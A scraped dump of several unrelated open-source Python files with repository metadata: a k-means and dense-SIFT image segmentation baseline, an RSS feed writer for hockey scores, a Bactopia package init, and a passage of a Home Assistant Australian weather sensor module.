src/scripts/segmentation/baselines/kmeans_and_sift.py
|
THinnerichs/MiS-Information-Clustering
|
597c70e1283222e0e841e24f6805b967aaf3c9e0
|
[
"MIT"
] | null | null | null |
src/scripts/segmentation/baselines/kmeans_and_sift.py
|
THinnerichs/MiS-Information-Clustering
|
597c70e1283222e0e841e24f6805b967aaf3c9e0
|
[
"MIT"
] | null | null | null |
src/scripts/segmentation/baselines/kmeans_and_sift.py
|
THinnerichs/MiS-Information-Clustering
|
597c70e1283222e0e841e24f6805b967aaf3c9e0
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import argparse
import os
import pickle
import sys
import cv2
import numpy as np
import torch
import vlfeat # calls constructor
from sklearn.cluster import MiniBatchKMeans
from src.utils.cluster.eval_metrics import _hungarian_match, _original_match, \
_acc
from src.utils.segmentation.data import make_Coco_dataloaders, \
make_Potsdam_dataloaders
SIFT_DLEN = 128
SIFT_STEP = 10
def _get_vectorised_sift_samples(archetype_config, dataloader):
# returns num unmasked pixels x SIFT_DLEN, in uint8 format
# operates on greyscale 128 bit images
num_batches, batch_sz = len(dataloader), archetype_config.dataloader_batch_sz
num_imgs_max = num_batches * batch_sz # estimate
img_sz = archetype_config.input_sz
# cluster individual (box central) pixels
desc_side = int(img_sz / SIFT_STEP)
print("img sz %d, desc_side %d" % (img_sz, desc_side))
sys.stdout.flush()
descs_all = np.zeros((num_imgs_max, desc_side * desc_side,
SIFT_DLEN), dtype=np.uint8)
masks_all = np.zeros((num_imgs_max, desc_side * desc_side), dtype=np.bool)
labels_all = None
actual_num_imgs = 0
# when descriptor matrix flattened, goes along rows first (rows change slow)
central_inds_h = (np.arange(desc_side) * SIFT_STEP +
(SIFT_STEP / 2)).reshape((desc_side, 1)).repeat(desc_side,
axis=1)
central_inds_w = (np.arange(desc_side) * SIFT_STEP +
(SIFT_STEP / 2)).reshape((1, desc_side)).repeat(desc_side,
axis=0)
central_inds_h, central_inds_w = central_inds_h.reshape(-1), \
central_inds_w.reshape(-1)
for b_i, batch in enumerate(dataloader):
if len(batch) == 3: # test dataloader
store_labels = True
if (labels_all is None):
labels_all = np.zeros((num_imgs_max, desc_side * desc_side),
dtype=np.int32)
imgs, labels, masks = batch
labels = labels.cpu().numpy().astype(np.int32)
else: # training dataloader
store_labels = False
imgs, _, _, masks = batch
# imgs currently channel first, [0-1] range, floats
imgs = (imgs * 255.).permute(0, 2, 3, 1).cpu().numpy().astype(np.uint8)
masks = masks.cpu().numpy().astype(np.bool)
curr_batch_sz, h, w, c = imgs.shape
assert (h == archetype_config.input_sz and w == archetype_config.input_sz
and c == archetype_config.in_channels)
if b_i < num_batches - 1:
assert (batch_sz == curr_batch_sz)
start = b_i * batch_sz
for i in range(curr_batch_sz):
grey_img = cv2.cvtColor(imgs[i, :, :, :], cv2.COLOR_RGB2GRAY)
locs, descs = vlfeat.vl_dsift(grey_img, step=SIFT_STEP)
descs = descs.transpose((1, 0)) # 40*40, 128
descs = descs.reshape(-1, SIFT_DLEN) # rows change slowest
# get the corresponding box central mask/label
mask = masks[i][central_inds_h, central_inds_w]
offset = start + i
descs_all[offset, :, :] = descs
masks_all[offset, :] = mask
if store_labels:
label = labels[i][central_inds_h, central_inds_w]
labels_all[offset, :] = label
actual_num_imgs += curr_batch_sz
descs_all = descs_all[:actual_num_imgs, :, :]
masks_all = masks_all[:actual_num_imgs, :]
num_unmasked = masks_all.sum()
if store_labels:
labels_all = labels_all[:actual_num_imgs, :]
samples_labels = labels_all[masks_all].reshape(-1)
assert (samples_labels.shape[0] == num_unmasked)
samples = descs_all[masks_all, :].reshape(-1, SIFT_DLEN)
assert (samples.shape[0] == num_unmasked)
if not store_labels:
return samples
else:
return samples, samples_labels
def _get_vectorised_colour_samples(archetype_config, dataloader):
num_batches, batch_sz = len(dataloader), archetype_config.dataloader_batch_sz
num_imgs_max = num_batches * batch_sz # estimate
img_sz = archetype_config.input_sz
# cluster individual pixels
imgs_all = np.zeros(
(num_imgs_max, img_sz, img_sz, archetype_config.in_channels),
dtype=np.uint8)
masks_all = np.zeros((num_imgs_max, img_sz, img_sz), dtype=np.bool)
labels_all = None
actual_num_imgs = 0
for b_i, batch in enumerate(dataloader):
if len(batch) == 3:
store_labels = True
if (labels_all is None):
labels_all = np.zeros((num_imgs_max, img_sz, img_sz), dtype=np.int32)
imgs, labels, masks = batch
labels = labels.cpu().numpy().astype(np.int32)
else:
store_labels = False
imgs, _, _, masks = batch
# channels last
imgs = (imgs * 255.).permute(0, 2, 3, 1).cpu().numpy().astype(np.uint8)
masks = masks.cpu().numpy().astype(np.bool)
curr_batch_sz, h, w, c = imgs.shape
assert (h == archetype_config.input_sz and w == archetype_config.input_sz
and c == archetype_config.in_channels)
if b_i < num_batches - 1:
assert (batch_sz == curr_batch_sz)
start = b_i * batch_sz
imgs_all[start:(start + curr_batch_sz), :, :, :] = imgs
masks_all[start:(start + curr_batch_sz), :, :] = masks
if store_labels:
labels_all[start:(start + curr_batch_sz), :, :] = labels
actual_num_imgs += curr_batch_sz
imgs_all = imgs_all[:actual_num_imgs, :, :, :]
masks_all = masks_all[:actual_num_imgs, :, :]
num_unmasked = masks_all.sum()
if store_labels:
labels_all = labels_all[:actual_num_imgs, :, :]
samples_labels = labels_all[masks_all].reshape(-1)
assert (samples_labels.shape[0] == num_unmasked)
samples = imgs_all[masks_all, :].reshape(-1, archetype_config.in_channels)
assert (samples.shape[0] == num_unmasked)
if not store_labels:
return samples
else:
return samples, samples_labels
def main():
# based on segmentation_multioutput_twohead - we pass in the config of the
# IID run we are comparing against, so the settings can be copied
parser = argparse.ArgumentParser()
parser.add_argument("--model_ind", type=int, required=True)
parser.add_argument("--out_root", type=str,
default="/scratch/shared/slow/xuji/iid_private")
parser.add_argument("--IID_model_ind", type=int, required=True)
parser.add_argument("--max_num_train", type=int, required=True)
parser.add_argument("--test_code", default=False, action="store_true")
parser.add_argument("--do_sift", default=False, action="store_true")
config = parser.parse_args()
config.out_dir = os.path.join(config.out_root, str(config.model_ind))
if not os.path.exists(config.out_dir):
os.makedirs(config.out_dir)
archetype_config_path = os.path.join(config.out_root,
str(config.IID_model_ind),
"config.pickle")
print("Loading archetype config from: %s" % archetype_config_path)
with open(archetype_config_path, "rb") as config_f:
archetype_config = pickle.load(config_f)
assert (config.IID_model_ind == archetype_config.model_ind)
assert (archetype_config.mode == "IID") # compare against fully unsup
sample_fn = _get_vectorised_colour_samples
if config.do_sift:
sample_fn = _get_vectorised_sift_samples
# set it to be only rgb (and ir if nec) but no sobel - we're clustering
# single pixel colours
archetype_config.include_rgb = True
archetype_config.no_sobel = True
if "Coco" in archetype_config.dataset:
assert (not archetype_config.using_IR)
archetype_config.in_channels = 3
elif archetype_config.dataset == "Potsdam": # IR
assert (archetype_config.using_IR)
archetype_config.in_channels = 4
# Data
# -------------------------------------------------------------------------
if "Coco" in archetype_config.dataset:
dataloaders_head_A, mapping_assignment_dataloader, \
mapping_test_dataloader = \
make_Coco_dataloaders(archetype_config)
elif archetype_config.dataset == "Potsdam":
dataloaders_head_A, mapping_assignment_dataloader, \
mapping_test_dataloader = \
make_Potsdam_dataloaders(archetype_config)
else:
raise NotImplementedError
# unlike in clustering script for STL - isn't any data from unknown classes
dataloaders_head_B = dataloaders_head_A
# networks and optimisers
# ------------------------------------------------------
assert (archetype_config.num_dataloaders == 1)
dataloader = dataloaders_head_B[0]
samples = sample_fn(archetype_config, dataloader)
print("got training samples")
sys.stdout.flush()
if config.test_code:
print("testing code, taking 10000 samples only")
samples = samples[:10000, :]
else:
num_samples_train = min(samples.shape[0], config.max_num_train)
print("taking %d samples" % num_samples_train)
chosen_inds = np.random.choice(samples.shape[0], size=num_samples_train,
replace=False)
samples = samples[chosen_inds, :]
print(samples.shape)
sys.stdout.flush()
kmeans = MiniBatchKMeans(n_clusters=archetype_config.gt_k, verbose=1).fit(
samples)
print("trained kmeans")
sys.stdout.flush()
# use mapping assign to assign output_k=gt_k to gt_k
# and also assess on its predictions, since it's identical to
# mapping_test_dataloader
assign_samples, assign_labels = sample_fn(archetype_config,
mapping_assignment_dataloader)
num_samples = assign_samples.shape[0]
assign_preds = kmeans.predict(assign_samples)
print("finished prediction for mapping assign/test data")
sys.stdout.flush()
assign_preds = torch.from_numpy(assign_preds).cuda()
assign_labels = torch.from_numpy(assign_labels).cuda()
if archetype_config.eval_mode == "hung":
match = _hungarian_match(assign_preds, assign_labels,
preds_k=archetype_config.gt_k,
targets_k=archetype_config.gt_k)
elif archetype_config.eval_mode == "orig": # flat!
match = _original_match(assign_preds, assign_labels,
preds_k=archetype_config.gt_k,
targets_k=archetype_config.gt_k)
elif archetype_config.eval_mode == "orig_soft":
assert (False) # not used
# reorder predictions to be same cluster assignments as gt_k
found = torch.zeros(archetype_config.gt_k)
reordered_preds = torch.zeros(num_samples).to(torch.int32).cuda()
for pred_i, target_i in match:
reordered_preds[assign_preds == pred_i] = target_i
found[pred_i] = 1
assert (found.sum() == archetype_config.gt_k) # each output_k must get mapped
acc = _acc(reordered_preds, assign_labels, archetype_config.gt_k)
print("got acc %f" % acc)
config.epoch_acc = [acc]
config.centroids = kmeans.cluster_centers_
config.match = match
# write results and centroids to model_ind output file
with open(os.path.join(config.out_dir, "config.pickle"), "w") as outfile:
pickle.dump(config, outfile)
with open(os.path.join(config.out_dir, "config.txt"), "w") as text_file:
text_file.write("%s" % config)
if __name__ == "__main__":
main()
| 36.618421
| 80
| 0.676967
|
from __future__ import print_function
import argparse
import os
import pickle
import sys
import cv2
import numpy as np
import torch
import vlfeat
from sklearn.cluster import MiniBatchKMeans
from src.utils.cluster.eval_metrics import _hungarian_match, _original_match, \
_acc
from src.utils.segmentation.data import make_Coco_dataloaders, \
make_Potsdam_dataloaders
SIFT_DLEN = 128
SIFT_STEP = 10
def _get_vectorised_sift_samples(archetype_config, dataloader):
num_batches, batch_sz = len(dataloader), archetype_config.dataloader_batch_sz
num_imgs_max = num_batches * batch_sz
img_sz = archetype_config.input_sz
desc_side = int(img_sz / SIFT_STEP)
print("img sz %d, desc_side %d" % (img_sz, desc_side))
sys.stdout.flush()
descs_all = np.zeros((num_imgs_max, desc_side * desc_side,
SIFT_DLEN), dtype=np.uint8)
masks_all = np.zeros((num_imgs_max, desc_side * desc_side), dtype=np.bool)
labels_all = None
actual_num_imgs = 0
central_inds_h = (np.arange(desc_side) * SIFT_STEP +
(SIFT_STEP / 2)).reshape((desc_side, 1)).repeat(desc_side,
axis=1)
central_inds_w = (np.arange(desc_side) * SIFT_STEP +
(SIFT_STEP / 2)).reshape((1, desc_side)).repeat(desc_side,
axis=0)
central_inds_h, central_inds_w = central_inds_h.reshape(-1), \
central_inds_w.reshape(-1)
for b_i, batch in enumerate(dataloader):
if len(batch) == 3:
store_labels = True
if (labels_all is None):
labels_all = np.zeros((num_imgs_max, desc_side * desc_side),
dtype=np.int32)
imgs, labels, masks = batch
labels = labels.cpu().numpy().astype(np.int32)
else:
store_labels = False
imgs, _, _, masks = batch
imgs = (imgs * 255.).permute(0, 2, 3, 1).cpu().numpy().astype(np.uint8)
masks = masks.cpu().numpy().astype(np.bool)
curr_batch_sz, h, w, c = imgs.shape
assert (h == archetype_config.input_sz and w == archetype_config.input_sz
and c == archetype_config.in_channels)
if b_i < num_batches - 1:
assert (batch_sz == curr_batch_sz)
start = b_i * batch_sz
for i in range(curr_batch_sz):
grey_img = cv2.cvtColor(imgs[i, :, :, :], cv2.COLOR_RGB2GRAY)
locs, descs = vlfeat.vl_dsift(grey_img, step=SIFT_STEP)
descs = descs.transpose((1, 0))
descs = descs.reshape(-1, SIFT_DLEN)
mask = masks[i][central_inds_h, central_inds_w]
offset = start + i
descs_all[offset, :, :] = descs
masks_all[offset, :] = mask
if store_labels:
label = labels[i][central_inds_h, central_inds_w]
labels_all[offset, :] = label
actual_num_imgs += curr_batch_sz
descs_all = descs_all[:actual_num_imgs, :, :]
masks_all = masks_all[:actual_num_imgs, :]
num_unmasked = masks_all.sum()
if store_labels:
labels_all = labels_all[:actual_num_imgs, :]
samples_labels = labels_all[masks_all].reshape(-1)
assert (samples_labels.shape[0] == num_unmasked)
samples = descs_all[masks_all, :].reshape(-1, SIFT_DLEN)
assert (samples.shape[0] == num_unmasked)
if not store_labels:
return samples
else:
return samples, samples_labels
def _get_vectorised_colour_samples(archetype_config, dataloader):
num_batches, batch_sz = len(dataloader), archetype_config.dataloader_batch_sz
num_imgs_max = num_batches * batch_sz
img_sz = archetype_config.input_sz
imgs_all = np.zeros(
(num_imgs_max, img_sz, img_sz, archetype_config.in_channels),
dtype=np.uint8)
masks_all = np.zeros((num_imgs_max, img_sz, img_sz), dtype=np.bool)
labels_all = None
actual_num_imgs = 0
for b_i, batch in enumerate(dataloader):
if len(batch) == 3:
store_labels = True
if (labels_all is None):
labels_all = np.zeros((num_imgs_max, img_sz, img_sz), dtype=np.int32)
imgs, labels, masks = batch
labels = labels.cpu().numpy().astype(np.int32)
else:
store_labels = False
imgs, _, _, masks = batch
imgs = (imgs * 255.).permute(0, 2, 3, 1).cpu().numpy().astype(np.uint8)
masks = masks.cpu().numpy().astype(np.bool)
curr_batch_sz, h, w, c = imgs.shape
assert (h == archetype_config.input_sz and w == archetype_config.input_sz
and c == archetype_config.in_channels)
if b_i < num_batches - 1:
assert (batch_sz == curr_batch_sz)
start = b_i * batch_sz
imgs_all[start:(start + curr_batch_sz), :, :, :] = imgs
masks_all[start:(start + curr_batch_sz), :, :] = masks
if store_labels:
labels_all[start:(start + curr_batch_sz), :, :] = labels
actual_num_imgs += curr_batch_sz
imgs_all = imgs_all[:actual_num_imgs, :, :, :]
masks_all = masks_all[:actual_num_imgs, :, :]
num_unmasked = masks_all.sum()
if store_labels:
labels_all = labels_all[:actual_num_imgs, :, :]
samples_labels = labels_all[masks_all].reshape(-1)
assert (samples_labels.shape[0] == num_unmasked)
samples = imgs_all[masks_all, :].reshape(-1, archetype_config.in_channels)
assert (samples.shape[0] == num_unmasked)
if not store_labels:
return samples
else:
return samples, samples_labels
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--model_ind", type=int, required=True)
parser.add_argument("--out_root", type=str,
default="/scratch/shared/slow/xuji/iid_private")
parser.add_argument("--IID_model_ind", type=int, required=True)
parser.add_argument("--max_num_train", type=int, required=True)
parser.add_argument("--test_code", default=False, action="store_true")
parser.add_argument("--do_sift", default=False, action="store_true")
config = parser.parse_args()
config.out_dir = os.path.join(config.out_root, str(config.model_ind))
if not os.path.exists(config.out_dir):
os.makedirs(config.out_dir)
archetype_config_path = os.path.join(config.out_root,
str(config.IID_model_ind),
"config.pickle")
print("Loading archetype config from: %s" % archetype_config_path)
with open(archetype_config_path, "rb") as config_f:
archetype_config = pickle.load(config_f)
assert (config.IID_model_ind == archetype_config.model_ind)
assert (archetype_config.mode == "IID")
sample_fn = _get_vectorised_colour_samples
if config.do_sift:
sample_fn = _get_vectorised_sift_samples
# single pixel colours
archetype_config.include_rgb = True
archetype_config.no_sobel = True
if "Coco" in archetype_config.dataset:
assert (not archetype_config.using_IR)
archetype_config.in_channels = 3
elif archetype_config.dataset == "Potsdam": # IR
assert (archetype_config.using_IR)
archetype_config.in_channels = 4
# Data
# -------------------------------------------------------------------------
if "Coco" in archetype_config.dataset:
dataloaders_head_A, mapping_assignment_dataloader, \
mapping_test_dataloader = \
make_Coco_dataloaders(archetype_config)
elif archetype_config.dataset == "Potsdam":
dataloaders_head_A, mapping_assignment_dataloader, \
mapping_test_dataloader = \
make_Potsdam_dataloaders(archetype_config)
else:
raise NotImplementedError
# unlike in clustering script for STL - isn't any data from unknown classes
dataloaders_head_B = dataloaders_head_A
assert (archetype_config.num_dataloaders == 1)
dataloader = dataloaders_head_B[0]
samples = sample_fn(archetype_config, dataloader)
print("got training samples")
sys.stdout.flush()
if config.test_code:
print("testing code, taking 10000 samples only")
samples = samples[:10000, :]
else:
num_samples_train = min(samples.shape[0], config.max_num_train)
print("taking %d samples" % num_samples_train)
chosen_inds = np.random.choice(samples.shape[0], size=num_samples_train,
replace=False)
samples = samples[chosen_inds, :]
print(samples.shape)
sys.stdout.flush()
kmeans = MiniBatchKMeans(n_clusters=archetype_config.gt_k, verbose=1).fit(
samples)
print("trained kmeans")
sys.stdout.flush()
# mapping_test_dataloader
assign_samples, assign_labels = sample_fn(archetype_config,
mapping_assignment_dataloader)
num_samples = assign_samples.shape[0]
assign_preds = kmeans.predict(assign_samples)
print("finished prediction for mapping assign/test data")
sys.stdout.flush()
assign_preds = torch.from_numpy(assign_preds).cuda()
assign_labels = torch.from_numpy(assign_labels).cuda()
if archetype_config.eval_mode == "hung":
match = _hungarian_match(assign_preds, assign_labels,
preds_k=archetype_config.gt_k,
targets_k=archetype_config.gt_k)
elif archetype_config.eval_mode == "orig": # flat!
match = _original_match(assign_preds, assign_labels,
preds_k=archetype_config.gt_k,
targets_k=archetype_config.gt_k)
elif archetype_config.eval_mode == "orig_soft":
assert (False) # not used
# reorder predictions to be same cluster assignments as gt_k
found = torch.zeros(archetype_config.gt_k)
reordered_preds = torch.zeros(num_samples).to(torch.int32).cuda()
for pred_i, target_i in match:
reordered_preds[assign_preds == pred_i] = target_i
found[pred_i] = 1
assert (found.sum() == archetype_config.gt_k) # each output_k must get mapped
acc = _acc(reordered_preds, assign_labels, archetype_config.gt_k)
print("got acc %f" % acc)
config.epoch_acc = [acc]
config.centroids = kmeans.cluster_centers_
config.match = match
# write results and centroids to model_ind output file
with open(os.path.join(config.out_dir, "config.pickle"), "w") as outfile:
pickle.dump(config, outfile)
with open(os.path.join(config.out_dir, "config.txt"), "w") as text_file:
text_file.write("%s" % config)
if __name__ == "__main__":
main()
| true
| true
|
790b2d371432522b12c630954ab58dc667368862
| 1,496
|
py
|
Python
|
markup.py
|
ak212/python-hockey-rss
|
60dc71168db53dee0eaf2bf02a40a73f5e3527db
|
[
"MIT"
] | 1
|
2015-12-22T18:37:45.000Z
|
2015-12-22T18:37:45.000Z
|
markup.py
|
ak212/python-hockey-rss
|
60dc71168db53dee0eaf2bf02a40a73f5e3527db
|
[
"MIT"
] | null | null | null |
markup.py
|
ak212/python-hockey-rss
|
60dc71168db53dee0eaf2bf02a40a73f5e3527db
|
[
"MIT"
] | null | null | null |
import os
__author__ = "Aaron Koeppel"
__version__ = 1.0
def xmlMarkup(games, team_ab, team_name, team_record):
'''Markup the RSS feed using the data obtained.
:param games: list of games that the team played this season
:type games: list of GameData
:param team_ab: the team's abbreviated name
:type team_ab: string
:param team_name: the team's name
:type team_name: string'''
file_name = team_ab + "_feed.xml"
'''Used code from http://stackoverflow.com/questions/7935972/
writing-to-a-new-directory-in-python-without-changing-directory'''
script_dir = os.path.dirname(os.path.abspath(__file__))
dest_dir = os.path.join(script_dir, "feeds", team_ab)
try:
os.makedirs(dest_dir)
except OSError:
pass
path = os.path.join(dest_dir, file_name)
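   # Write a minimal RSS 2.0 document: channel metadata followed by one <item> per game.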
with open(path, 'w') as xml:
xml.write('<?xml version="1.0" encoding="UTF-8" ?>\n')
xml.write("<rss version='2.0'>\n")
xml.write("<channel>\n")
xml.write("<title>%s - %s</title>\n" % (team_name, team_record))
xml.write("<description>Latest %s scores</description>\n" % team_name)
xml.write("<link>http://espn.go.com/nhl/team/schedule/_/name/%s</link>\n"
% team_ab)
for game in games:
xml.write("<item>\n")
xml.write("<title>%s</title>\n" % game.headline)
xml.write("<link>%s</link>\n" % game.link)
xml.write("</item>\n")
xml.write("</channel>\n</rss>")
xml.close()
| 32.521739
| 79
| 0.625
|
import os
__author__ = "Aaron Koeppel"
__version__ = 1.0
def xmlMarkup(games, team_ab, team_name, team_record):
file_name = team_ab + "_feed.xml"
script_dir = os.path.dirname(os.path.abspath(__file__))
dest_dir = os.path.join(script_dir, "feeds", team_ab)
try:
os.makedirs(dest_dir)
except OSError:
pass
path = os.path.join(dest_dir, file_name)
with open(path, 'w') as xml:
xml.write('<?xml version="1.0" encoding="UTF-8" ?>\n')
xml.write("<rss version='2.0'>\n")
xml.write("<channel>\n")
xml.write("<title>%s - %s</title>\n" % (team_name, team_record))
xml.write("<description>Latest %s scores</description>\n" % team_name)
xml.write("<link>http://espn.go.com/nhl/team/schedule/_/name/%s</link>\n"
% team_ab)
for game in games:
xml.write("<item>\n")
xml.write("<title>%s</title>\n" % game.headline)
xml.write("<link>%s</link>\n" % game.link)
xml.write("</item>\n")
xml.write("</channel>\n</rss>")
xml.close()
| true
| true
|
790b2d4cde58cc65a51793d21e5e265754f9f859
| 140
|
py
|
Python
|
bactopia/__init__.py
|
bactopia/bactopia-ap
|
f87c55f3c9f8c7aca230d7a6146db078acd6d141
|
[
"MIT"
] | null | null | null |
bactopia/__init__.py
|
bactopia/bactopia-ap
|
f87c55f3c9f8c7aca230d7a6146db078acd6d141
|
[
"MIT"
] | 9
|
2019-05-20T17:05:09.000Z
|
2019-08-29T12:59:57.000Z
|
bactopia/__init__.py
|
bactopia/bactopia-ap
|
f87c55f3c9f8c7aca230d7a6146db078acd6d141
|
[
"MIT"
] | null | null | null |
"""Top-level package for Bactopia."""
__version__ = '2.1.0'
__all__ = [
'const',
'parse',
'summary'
]
from bactopia import *
| 11.666667
| 37
| 0.585714
|
__version__ = '2.1.0'
__all__ = [
'const',
'parse',
'summary'
]
from bactopia import *
| true
| true
|
790b2ddc74fef2c4be27a4d6c1b24dcbd933e151
| 11,621
|
py
|
Python
|
homeassistant/components/bom/sensor.py
|
alemuro/home-assistant
|
9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90
|
[
"Apache-2.0"
] | 2
|
2019-10-19T15:07:32.000Z
|
2022-01-29T10:33:20.000Z
|
homeassistant/components/bom/sensor.py
|
alemuro/home-assistant
|
9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90
|
[
"Apache-2.0"
] | 4
|
2021-02-08T21:05:14.000Z
|
2021-09-08T02:57:03.000Z
|
homeassistant/components/bom/sensor.py
|
alemuro/home-assistant
|
9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90
|
[
"Apache-2.0"
] | 2
|
2019-01-21T05:49:23.000Z
|
2019-02-19T16:30:48.000Z
|
"""Support for Australian BOM (Bureau of Meteorology) weather service."""
import datetime
import ftplib
import gzip
import io
import json
import logging
import os
import re
import zipfile
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_MONITORED_CONDITIONS,
TEMP_CELSIUS,
CONF_NAME,
ATTR_ATTRIBUTION,
CONF_LATITUDE,
CONF_LONGITUDE,
)
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_RESOURCE = "http://www.bom.gov.au/fwo/{}/{}.{}.json"
_LOGGER = logging.getLogger(__name__)
ATTR_LAST_UPDATE = "last_update"
ATTR_SENSOR_ID = "sensor_id"
ATTR_STATION_ID = "station_id"
ATTR_STATION_NAME = "station_name"
ATTR_ZONE_ID = "zone_id"
ATTRIBUTION = "Data provided by the Australian Bureau of Meteorology"
CONF_STATION = "station"
CONF_ZONE_ID = "zone_id"
CONF_WMO_ID = "wmo_id"
MIN_TIME_BETWEEN_UPDATES = datetime.timedelta(seconds=60)
SENSOR_TYPES = {
"wmo": ["wmo", None],
"name": ["Station Name", None],
"history_product": ["Zone", None],
"local_date_time": ["Local Time", None],
"local_date_time_full": ["Local Time Full", None],
"aifstime_utc": ["UTC Time Full", None],
"lat": ["Lat", None],
"lon": ["Long", None],
"apparent_t": ["Feels Like C", TEMP_CELSIUS],
"cloud": ["Cloud", None],
"cloud_base_m": ["Cloud Base", None],
"cloud_oktas": ["Cloud Oktas", None],
"cloud_type_id": ["Cloud Type ID", None],
"cloud_type": ["Cloud Type", None],
"delta_t": ["Delta Temp C", TEMP_CELSIUS],
"gust_kmh": ["Wind Gust kmh", "km/h"],
"gust_kt": ["Wind Gust kt", "kt"],
"air_temp": ["Air Temp C", TEMP_CELSIUS],
"dewpt": ["Dew Point C", TEMP_CELSIUS],
"press": ["Pressure mb", "mbar"],
"press_qnh": ["Pressure qnh", "qnh"],
"press_msl": ["Pressure msl", "msl"],
"press_tend": ["Pressure Tend", None],
"rain_trace": ["Rain Today", "mm"],
"rel_hum": ["Relative Humidity", "%"],
"sea_state": ["Sea State", None],
"swell_dir_worded": ["Swell Direction", None],
"swell_height": ["Swell Height", "m"],
"swell_period": ["Swell Period", None],
"vis_km": ["Visability km", "km"],
"weather": ["Weather", None],
"wind_dir": ["Wind Direction", None],
"wind_spd_kmh": ["Wind Speed kmh", "km/h"],
"wind_spd_kt": ["Wind Speed kt", "kt"],
}
def validate_station(station):
"""Check that the station ID is well-formed."""
if station is None:
return
station = station.replace(".shtml", "")
if not re.fullmatch(r"ID[A-Z]\d\d\d\d\d\.\d\d\d\d\d", station):
raise vol.error.Invalid("Malformed station ID")
return station
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Inclusive(CONF_ZONE_ID, "Deprecated partial station ID"): cv.string,
vol.Inclusive(CONF_WMO_ID, "Deprecated partial station ID"): cv.string,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_STATION): validate_station,
vol.Required(CONF_MONITORED_CONDITIONS, default=[]): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the BOM sensor."""
station = config.get(CONF_STATION)
zone_id, wmo_id = config.get(CONF_ZONE_ID), config.get(CONF_WMO_ID)
if station is not None:
if zone_id and wmo_id:
_LOGGER.warning(
"Using config %s, not %s and %s for BOM sensor",
CONF_STATION,
CONF_ZONE_ID,
CONF_WMO_ID,
)
elif zone_id and wmo_id:
station = "{}.{}".format(zone_id, wmo_id)
else:
station = closest_station(
config.get(CONF_LATITUDE),
config.get(CONF_LONGITUDE),
hass.config.config_dir,
)
if station is None:
_LOGGER.error("Could not get BOM weather station from lat/lon")
return
bom_data = BOMCurrentData(station)
try:
bom_data.update()
except ValueError as err:
_LOGGER.error("Received error from BOM Current: %s", err)
return
add_entities(
[
BOMCurrentSensor(bom_data, variable, config.get(CONF_NAME))
for variable in config[CONF_MONITORED_CONDITIONS]
]
)
class BOMCurrentSensor(Entity):
"""Implementation of a BOM current sensor."""
def __init__(self, bom_data, condition, stationname):
"""Initialize the sensor."""
self.bom_data = bom_data
self._condition = condition
self.stationname = stationname
@property
def name(self):
"""Return the name of the sensor."""
if self.stationname is None:
return "BOM {}".format(SENSOR_TYPES[self._condition][0])
return "BOM {} {}".format(self.stationname, SENSOR_TYPES[self._condition][0])
@property
def state(self):
"""Return the state of the sensor."""
return self.bom_data.get_reading(self._condition)
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
attr = {
ATTR_ATTRIBUTION: ATTRIBUTION,
ATTR_LAST_UPDATE: self.bom_data.last_updated,
ATTR_SENSOR_ID: self._condition,
ATTR_STATION_ID: self.bom_data.latest_data["wmo"],
ATTR_STATION_NAME: self.bom_data.latest_data["name"],
ATTR_ZONE_ID: self.bom_data.latest_data["history_product"],
}
return attr
@property
def unit_of_measurement(self):
"""Return the units of measurement."""
return SENSOR_TYPES[self._condition][1]
def update(self):
"""Update current conditions."""
self.bom_data.update()
class BOMCurrentData:
"""Get data from BOM."""
def __init__(self, station_id):
"""Initialize the data object."""
self._zone_id, self._wmo_id = station_id.split(".")
self._data = None
self.last_updated = None
def _build_url(self):
"""Build the URL for the requests."""
url = _RESOURCE.format(self._zone_id, self._zone_id, self._wmo_id)
_LOGGER.debug("BOM URL: %s", url)
return url
@property
def latest_data(self):
"""Return the latest data object."""
if self._data:
return self._data[0]
return None
def get_reading(self, condition):
"""Return the value for the given condition.
BOM weather publishes condition readings for weather (and a few other
conditions) at intervals throughout the day. To avoid a `-` value in
the frontend for these conditions, we traverse the historical data
for the latest value that is not `-`.
Iterators are used in this method to avoid iterating needlessly
through the entire BOM provided dataset.
"""
condition_readings = (entry[condition] for entry in self._data)
return next((x for x in condition_readings if x != "-"), None)
def should_update(self):
"""Determine whether an update should occur.
BOM provides updated data every 30 minutes. We manually define
refreshing logic here rather than a throttle to keep updates
in lock-step with BOM.
If 35 minutes has passed since the last BOM data update, then
an update should be done.
"""
if self.last_updated is None:
# Never updated before, therefore an update should occur.
return True
now = datetime.datetime.now()
update_due_at = self.last_updated + datetime.timedelta(minutes=35)
return now > update_due_at
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Get the latest data from BOM."""
if not self.should_update():
_LOGGER.debug(
"BOM was updated %s minutes ago, skipping update as"
" < 35 minutes, Now: %s, LastUpdate: %s",
(datetime.datetime.now() - self.last_updated),
datetime.datetime.now(),
self.last_updated,
)
return
try:
result = requests.get(self._build_url(), timeout=10).json()
self._data = result["observations"]["data"]
# set lastupdate using self._data[0] as the first element in the
# array is the latest date in the json
self.last_updated = datetime.datetime.strptime(
str(self._data[0]["local_date_time_full"]), "%Y%m%d%H%M%S"
)
return
except ValueError as err:
_LOGGER.error("Check BOM %s", err.args)
self._data = None
raise
def _get_bom_stations():
"""Return {CONF_STATION: (lat, lon)} for all stations, for auto-config.
This function does several MB of internet requests, so please use the
caching version to minimise latency and hit-count.
"""
latlon = {}
with io.BytesIO() as file_obj:
with ftplib.FTP("ftp.bom.gov.au") as ftp:
ftp.login()
ftp.cwd("anon2/home/ncc/metadata/sitelists")
ftp.retrbinary("RETR stations.zip", file_obj.write)
file_obj.seek(0)
with zipfile.ZipFile(file_obj) as zipped:
with zipped.open("stations.txt") as station_txt:
for _ in range(4):
station_txt.readline() # skip header
while True:
line = station_txt.readline().decode().strip()
if len(line) < 120:
break # end while loop, ignoring any footer text
wmo, lat, lon = (
line[a:b].strip() for a, b in [(128, 134), (70, 78), (79, 88)]
)
